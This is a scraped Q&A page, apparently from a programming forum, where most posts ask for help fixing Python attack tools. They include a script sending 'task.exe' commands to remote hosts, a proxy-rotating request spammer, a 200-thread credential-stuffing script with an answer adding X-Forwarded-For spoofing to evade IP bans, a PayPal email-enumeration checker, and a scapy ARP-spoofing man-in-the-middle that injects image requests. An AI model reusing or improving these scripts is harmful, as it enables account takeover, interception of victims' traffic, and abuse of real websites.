I am trying to increment the start_ip and end_ip each iteration by 1. Although whenever the function results in the else statement 'already active' the counter keeps going. Is there a way to make number1 pause in the for loop when it hits ip is active? I tried decrementing it by one and adding a break but that does not seem to work.
#!/usr/bin/env python3
import requests
import time
import re
headers = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8','User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0','Accept-Encoding': 'gzip, deflate','Upgrade-Insecure-Requests': '1','Accept-Language': 'en-US,en;q=0.5'}
def log(ip):
log = open("ip_active.txt","a+")
log.write(ip)
log.close
def start_ip():
x = 0
while x == 0:
for number1 in range(1,254):
start_ip = '192.168.' + str(number1) + '.1'
end_ip = '192.168.' + str(number1) +'.254'
with open('ip_list.txt', 'r') as iplist:
for ip in iplist:
with open('ip_active.txt', 'r') as ipactive:
try:
if(ip not in ipactive):
log(ip)
print('Running task: ' + ip +f'task.exe%20{start_ip}%20{end_ip}')
target = ip.strip()+f'task.exe%20{start_ip}%20{end_ip}'
r = requests.get(target, allow_redirects=True, verify=False, headers=headers, timeout=1)
else:
#Here number1 keeps incrementing as well but should not.
print(f'ip {ip} already active')
time.sleep(2)
except:
print('Timeout')
continue
def main():
start_ip()
if __name__ == "__main__":
main()
Output:
ip http ://172.16.86.153 already active ip http ://172.16.86.152 already active Running task: http://172.16.86.153/?747fb083889d4d3591b8e185032f958c= task.exe%20192.168.**1**.1%20192.168.**1**.254 Running task: http://172.16.86.152/?93440f9cf9f743f2b5e4269ec73d4b78= task.exe%20192.168.**2**.1%20192.168.**2**.254 ip http ://172.16.86.153 already active ip http ://172.16.86.152 already active
It should continue with:
Running task: http ://172.16.86.152/?93440f9cf9f743f2b5e4269ec73d4b78= task.exe%20192.168.**3**.1%20192.168.**3**.254 Running task: http ://172.16.86.153/?93440f9cf9f743f2b5e4269ec73d4b78= task.exe%20192.168.**4**.1%20192.168.**4**.254
but now it results in for example :
Running task: http ://172.16.86.152/?93440f9cf9f743f2b5e4269ec73d4b78= task.exe%20192.168.**120**.1%20192.168.**120**.254 Running task: http ://172.16.86.153/?93440f9cf9f743f2b5e4269ec73d4b78= task.exe%20192.168.**121**.1%20192.168.**121**.254
As can be seen when an IP is available it is running the task for example with IP 192.168.12.1 192.168.12.254, for the next IP: 192.168.13.1 192.168.13.254, next ip 192.168.14.1 192.168.14.254 and so on. However when an IP is already active it keeps counting, so it skips those for Running tasks.
Related
I am working on a simple web scraper and rn trying to implement some multithreading. While my code works as intended with some servers(reducing time of execution vastly), my primary goal is to make it work with few specific ones. So when I try it with the ones in sites list, I get performance like I am still using sequential code. Any guesses what can cause this?
import requests, time
from bs4 import BeautifulSoup
from threading import Thread
from random import choice
# Enable to get some logging info
#---------------------------------
# import logging
# import http.client
# http.client.HTTPConnection.debuglevel = 1
# logging.basicConfig()
# logging.getLogger().setLevel(logging.DEBUG)
# requests_log = logging.getLogger("requests.packages.urllib3")
# requests_log.setLevel(logging.DEBUG)
# requests_log.propagate = True
sites = [
"https://pikabu.ru/community/blackhumour",
"https://www.pikabu.ru/tag/%D0%9C%D0%B5%D0%BC%D1%8B/hot"
]
class Pikabu_Downloader(Thread):
def __init__(self, url, name, *args, **kwargs):
super().__init__(*args, **kwargs)
self.url = url
self.name = name
self.begin = time.time()
def run(self):
print("Beginning with thread number",self.name, ",", round(time.time()-self.begin, 4), " seconds has passed")
html_data = self._get_html()
print("After requests.get with thread number", self.name, ",", round(time.time()-self.begin, 4), " seconds has passed")
if html_data is None:
return
self.soup = BeautifulSoup(html_data, "html.parser")
print("After making soup with thread number", self.name, ",", round(time.time() - self.begin, 4), " seconds has passed")
def _get_html(self):
try:
user_agents = ('Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'AppleWebKit/537.36 (KHTML, like Gecko)', 'Chrome/74.0.3729.169', 'Safari/537.36')
print(f"Go {self.url}...")
res = requests.get(self.url, headers={'User-Agent': choice(user_agents)}, stream = True)#, allow_redirects=False)
except Exception as exc:
print(exc)
else:
return res.text
test = "https://readingbooks.site/read/?name=1984&"
def download():
pikabu_urls = []
for url in sites:
pikabu = [url + "?page=" + str(x) for x in range(1, 10)]
pikabu_urls = pikabu_urls + pikabu
pikabu_dls = [Pikabu_Downloader(url=page, name=str(i)) for i, page in enumerate(pikabu_urls)]
# Comment the string above and enable 2 underlying strings to get result from test server
# tests = [test + "page=" + str(x) for x in range(1, pages)]
# pikabu_dls = [Pikabu_Downloader(url=page, name=str(i)) for i, page in enumerate(tests)]
for pikabu_dl in pikabu_dls:
pikabu_dl.start()
for pikabu_dl in pikabu_dls:
pikabu_dl.join()
download()
And the result is something like
...
After requests.get with thread number 1 , 1.6904 seconds has passed
After making soup with thread number 1 , 1.7554 seconds has passed
After requests.get with thread number 2 , 2.9805 seconds has passed
After making soup with thread number 2 , 3.0455 seconds has passed
After requests.get with thread number 3 , 4.3225 seconds has passed
After making soup with thread number 3 , 4.3895 seconds has passed
...
What can cause such latency between thread executions? I was hoping to get each thread to finish almost simultaneously and to get more...asynchronous output, like with server from test. If I set a timeout of 5 sec inside requests.get, most of the requests wont even work.
After I investigated your case, I would point out some issues that you have encountered:
Do not print when it is on parallel tasks, it will cause the bottle-neck on the way of rendering to screen
The large of tasks are not always good for performance, it depends on how much your memory will process. Imagine that you have 1000 links, you have to create 1000 task objects? No, only place-holder for 5-20 by leveraging ThreadPool
Server also is a problem to deal with when taking request. Downloaded size, low bandwidth, network, distancing,.. caused response late will affect your physic machine. Your sites are weight, it seems consuming 1-3000ms each request so when you test it with small size (20 links), it makes you feel it runs sequentially
Your code is running parallel, since you do a little bit trick to put it on different threads, it is not quite right because we need a fully async library, such like asyncio and aiohttp. The aiohttp will take care numerous async requests on the Coroutine whereas asyncio will support syntax and operate on your main thread.
I did a small experiment on colab, please be noticed that I didn't use asyncio and aiohttp on colab because of stuck, but I have implemented on several projects before and it worked faster than below fastest method.
The second function is your implementation
import urllib.request
from threading import Thread
import time, requests
from random import choice
user_agents = ('Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'AppleWebKit/537.36 (KHTML, like Gecko)', 'Chrome/74.0.3729.169', 'Safari/537.36')
timeout = 5
sites = [
"https://pikabu.ru/community/blackhumour",
"https://www.pikabu.ru/tag/%D0%9C%D0%B5%D0%BC%D1%8B/hot"
]
URLS = []
for url in sites:
pikabu = [url + "?page=" + str(x) for x in range(25)]
URLS.extend(pikabu)
def convert_to_threads():
return [Thread(target=load_url, args=(page, timeout)) for page in URLS]
def running_threads():
threads = convert_to_threads()
start = time.time()
for i in threads:
i.start()
for i in threads:
i.join()
print(f'Finish with {len(URLS)} requests {time.time() - start}')
def load_url(url, timeout):
res = requests.get(url, headers={'User-Agent': choice(user_agents)}, stream = True)#, allow_redirects=False)
return res.text
def running_sequence():
start = time.time()
for url in URLS:
load_url(url, timeout)
print(f'Finish with {len(URLS)} requests {time.time() - start}')
def running_thread_pool():
start = time.time()
# We can use a with statement to ensure threads are cleaned up promptly
with concurrent.futures.ThreadPoolExecutor(max_workers=15) as executor:
# Start the load operations and mark each future with its URL
future_to_url = {executor.submit(load_url, url, timeout): url for url in URLS}
for future in concurrent.futures.as_completed(future_to_url):
url = future_to_url[future]
try:
data = future.result()
except Exception as exc:
print('%r generated an exception: %s' % (url, exc))
# else:
# print('%r page is %d length' % (url, len(data)))
print(f'Finish with {len(URLS)} requests {time.time() - start}')
In short, I recommend you use ThreadPool (prefer in colab), or asyncio and aiohttp (not in colab) to gain speed
I have a little python script for spamming requests to a URL using Requests, It uses proxies so the IPs are random, I have a text folder called https.txt that has over two thousand proxies that I've gotten.
I attempted to multithread the program, but I feel like what I'm doing isn't exactly ideal for what I'm doing. If I could get any advice on how to improve this, that would be much appreciated
from colorama import Fore, Back, Style, init
import requests
import threading
init()
# constant vars
link = "" # URL goes here
agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
referer = ""
proxies = open("https.txt", "r")
# dynamic vars
threadLock = threading.Lock()
threads = []
num = 0
class myThread (threading.Thread):
def __init__(self, threadID, name, counter, proxy):
threading.Thread.__init__(self)
self.threadID = threadID
self.name = name
self.counter = counter
self.proxy = proxy
def run(self):
# print("Starting " + self.name)
spam(self.name, proxy)
# Each thread runs this function once
def spam(threadName, proxy):
try:
headers = {
"user-agent": agent,
"referer": referer
}
req = requests.get(url=link, headers=headers, proxies=proxy, timeout=100)
status = req.status_code
req.close()
if status == 200:
print(Fore.CYAN + threadName + ": Working request with proxy: " + Fore.YELLOW + x.strip())
else:
print(Fore.GREEN + threadName + ": Connection Code Status Error:", status)
except IOError :
print(Fore.RED + threadName + ": Connection error - Bad Proxy")
for x in proxies:
thread = str(num)
num = num + 1
proxy = {
"https": x.strip()
}
thread = myThread(thread, "Thread-" + thread, num, proxy)
thread.start()
# Wait for all threads to complete
for t in threads:
t.join()
As a part of an ethical hacking camp, I am working on an assignment where I have to make multiple login requests on a website using proxies. To do that I've come up with following code:
import requests
from Queue import Queue
from threading import Thread
import time
from lxml import html
import json
from time import sleep
global proxy_queue
global user_queue
global hits
global stats
global start_time
def get_default_header():
return {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0',
'X-Requested-With': 'XMLHttpRequest',
'Referer': 'https://www.example.com/'
}
def make_requests():
global user_queue
while True:
uname_pass = user_queue.get().split(':')
status = get_status(uname_pass[0], uname_pass[1].replace('\n', ''))
if status == 1:
hits.put(uname_pass)
stats['hits'] += 1
if status == 0:
stats['fake'] += 1
if status == -1:
user_queue.put(':'.join(uname_pass))
stats['IP Banned'] += 1
if status == -2:
stats['Exception'] += 1
user_queue.task_done()
def get_status(uname, password):
global proxy_queue
try:
if proxy_queue.empty():
print 'Reloaded proxies, sleeping for 2 mins'
sleep(120)
session = requests.session()
proxy = 'http://' + proxy_queue.get()
login_url = 'http://example.com/login'
header = get_default_header()
header['X-Forwarded-For'] = '8.8.8.8'
login_page = session.get(
login_url,
headers=header,
proxies={
'http':proxy
}
)
tree = html.fromstring(login_page.text)
csrf = list(set(tree.xpath("//input[#name='csrfmiddlewaretoken']/#value")))[0]
payload = {
'email': uname,
'password': password,
'csrfmiddlewaretoken': csrf,
}
result = session.post(
login_url,
data=payload,
headers=header,
proxies={
'http':proxy
}
)
if result.status_code == 200:
if 'access_token' in session.cookies:
return 1
elif 'Please check your email and password.' in result.text:
return 0
else:
# IP banned
return -1
else:
# IP banned
return -1
except Exception as e:
print e
return -2
def populate_proxies():
global proxy_queue
proxy_queue = Queue()
with open('nice_proxy.txt', 'r') as f:
for line in f.readlines():
proxy_queue.put(line.replace('\n', ''))
def hit_printer():
while True:
sleep(5)
print '\r' + str(stats) + ' Combos/min: ' + str((stats['hits'] + stats['fake'])/((time.time() - start_time)/60)),
if __name__ == '__main__':
global user_queue
global proxy_queue
global stats
global start_time
stats = dict()
stats['hits'] = 0
stats['fake'] = 0
stats['IP Banned'] = 0
stats['Exception'] = 0
threads = 200
hits = Queue()
uname_password_file = '287_uname_pass.txt'
populate_proxies()
user_queue = Queue(threads)
for i in range(threads):
t = Thread(target=make_requests)
t.daemon = True
t.start()
hit_printer = Thread(target=hit_printer)
hit_printer.daemon = True
hit_printer.start()
start_time = time.time()
try:
count = 0
with open(uname_password_file, 'r') as f:
for line in f.readlines():
count += 1
if count > 2000:
break
user_queue.put(line.replace('\n', ''))
user_queue.join()
print '####################Result#####################'
while not hits.empty():
print hits.get()
ttr = round(time.time() - start_time, 3)
print 'Time required: ' + str(ttr)
print 'average combos/min: ' + str(ceil(2000/(ttr/60)))
except Exception as e:
print e
So it is expected to make many requests on the website through multiple threads, but it doesn't work as expected. After a few requests, the proxies get banned, and it stops working. Since I'm disposing off the proxy after I use it, it shouldn't be the case. So I believe it might be due to one of the following
In an attempt to make multiple requests using multiple sessions, it's somehow failing to maintain disparateness for not supporting asynchronicity.
The victim site bans IPs based on its groups e.g., Banning all IPs starting with 132.x.x.x on receiving multiple requests from any of the 132.x.x.x IPs
The victim site is using headers like 'X-Forwarded-for', 'Client-IP', 'Via', or a similar header to detect the originating IP. But it seems unlikely because I can log in via by browser, without any proxy, and it doesn't throw any error, meaning my IP isn't exposed in any sense.
I am unsure weather I'm making an error in the threading part or the requests part, any help is appreciated.
I have figured out what the problem was, thanks to #Martijn Pieters, as usual, he's a life saver.
I was using elite level proxies and there was no way the victim site could have found my IP address, however, it was using X-Forwarded-For to detect my root IP address.
Since elite level proxies do not expose the IP address and don't attach the Client-IP header, the only way the victim could detect my IP was using the latest address in X-Forwarded-For. The solution to this problem is setting the X-Forwarded-For header to a random IP address everytime a requests is made which successfully spoofs the victim site into believing that the request is legit.
header['X-Forwarded-For'] = '.'.join([str(random.randint(0,255)) for i in range(4)])
im checking my customers countries so as to i know which service i can offer bla bla......
so the the problems is the threads blocks for example it check 15-20 and block, i want a solution to keep it continuing
the code is:
import requests
import re
from sys import argv
from Queue import Queue
from threading import Thread
e = argv[1]
emails = open(e, 'r').readlines()
emails = map(lambda s: s.strip(), emails)
valid=[]
def base(email):
xo = requests.get("http://www.paypal.com/xclick/business="+email, headers={"User-Agent":"Mozilla/5.0 (Windows NT 5.0; rv:21.0) Gecko/20100101 Firefox/21.0"}).text
x = re.search("s.eVar36=\"(.*?)\";", xo)
try:
if x.group(1) != "":
print "%s === %s" % (email,x.group(1))
w=open(str(x.group(1))+".txt", 'a')
w.write(email+"\n")
valid.append(email)
except:
pass
def work():
email=q.get()
base(email)
q.task_done()
THREADS = 25
q=Queue()
for i in range(THREADS):
t=Thread(target=work())
t.daemon=True
t.start()
if (len(argv)>0):
for email in emails:
q.put(email)
q.join()`enter code here
thanks in advance
Your problem is that you call work() instead of passing the work function when creating your threads. Instead of putting changes in your code, consider moving the python's ThreadPool which does the heavy lifting for you. Here's an example that implements what you want.
map calls your worker for each email in the iterator and returns the worker's result as an iterator (python 3) or list (python 2). Your worker returns a valid email or None for each email its given, so you just have to filter out the Nones at the end.
import requests
import re
from sys import argv
import multiprocessing.pool
e = argv[1]
emails = [line.strip() for line in open(e)]
def base(email):
print("getting email {}".format(email))
try:
xo = requests.get("http://www.paypal.com/xclick/business="+email, headers={"User-Agent":"Mozilla/5.0 (Windows NT 5.0; rv:21.0) Gecko/20100101 Firefox/21.0"}).text
x = re.search("s.eVar36=\"(.*?)\";", xo)
try:
if x.group(1) != "":
print "%s === %s" % (email,x.group(1))
with open(str(x.group(1))+".txt", 'a') as w:
w.write(email+"\n")
return email
except:
pass
except requests.exceptions.RequestException as e:
print(e)
THREADS = 25
pool = multiprocessing.pool.ThreadPool(THREADS)
valid = [email for email in pool.map(base, emails, chunksize=1) if email]
print(valid)
pool.close()
A short explanation of what I am trying to do :)
I want to replace every picture within the http traffic with a specific one.
I start with arp spoofing to get into the traffic. Then I am checking if the packet contains http-raw data. If it does, I am gonna check if the request is an image-request. If it is an image-request I try to replace that request with my own.
Here is my code:
#!/usr/bin/python
from scapy.all import *
import threading
import os
# Destination is the IP-Adress of the Victim
# Source ist the IP-Adress of the Gateway
# Opcode is Reply (2)
def VictimPoisoning() :
VictimPacket = ARP(pdst=VictimIP, psrc=GatewayIP, op=2)
while True :
try:
send(VictimPacket, verbose = 0)
except KeyboardInterupt:
sys.exit(1)
# Source ist the IP-Adress of the Gateway
# Destination is the IP-Adress of the Victim
# Opcode is Reply (2)
def GatewayPoisoning() :
GatewayPacket = ARP(pdst=GatewayIP, psrc=VictimIP, op=2)
while True:
try:
send(GatewayPacket, verbose = 0)
except KeyboardInterupt:
sys.exit(1)
def TCPHttpExtract(pkt):
if pkt.haslayer(TCP) and pkt.getlayer(TCP).dport == 80 and pkt.getlayer(Raw):
#This packet should be sent by every image request
OwnPacket="GET /resources/css/mdr/global/img/iconFlash.jpg HTTP/1.1\nHost: www.site.com\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:34.0) Gecko/20100101 Firefox/34.0\nAccept: image/png,image/*;q=0.8,*/*;q=0.5\nAccept-Language: de,en-US;q=0.7,en;q=0.3\nConnection: keep-alive"
StringJPG=""
StringPNG=""
StringGIF=""
StringPacket=""
liste=[]
for line in pkt.getlayer(Raw) :
liste.append(line)
#Check if the requests contains an *.jpg, *.png, *.gif
#Just check JPG - rest will be implemented later on
StringPacket=re.findall('(\s\/.*?\s)', str(liste))
StringJPG=re.findall('.*\.jpg', str(StringPacket))
StringPNG=re.findall('.*\.png', str(StringPacket))
StringGIF=re.findall('.*\.gif', str(StringPacket))
if(StringJPG):
send(OwnPacket)
#Forward packets
os.system('echo 1 > /proc/sys/net/ipv4/ip_forward')
print "\n----------------------------------------"
VictimIP = raw_input("Victim-IP: ")
GatewayIP = raw_input("Gateway-IP: ")
IFACE = raw_input("Interface: ")
print "-----------------------------------------\n"
VictimThread = []
GatewayThread = []
print "Start poisoning the Victim ... \n"
while True:
try:
# VictimThread
VicPoison = threading.Thread(target=VictimPoisoning)
VicPoison.setDaemon(True)
VictimThread.append(VicPoison)
VicPoison.start()
# GatewayThread
GWayPoison = threading.Thread(target=GatewayPoisoning)
GWayPoison.setDaemon(True)
GatewayThread.append(GWayPoison)
GWayPoison.start()
pkt=sniff(iface=IFACE, prn=TCPHttpExtract)
# Cancel with STRG+C
except KeyboardInterupt:
sys.exit(1)
The arp spoofing is working and also the image regex and the sending of the packet but the browser won t change/get this image. Do I have to destroy the original packet first? I don t want to use ettercap, I want to do it with python here :)
*Sorry for that bad formating.
Thanks to you all for your help! :)
The answer to this question is proxpy in combination with ip-tables.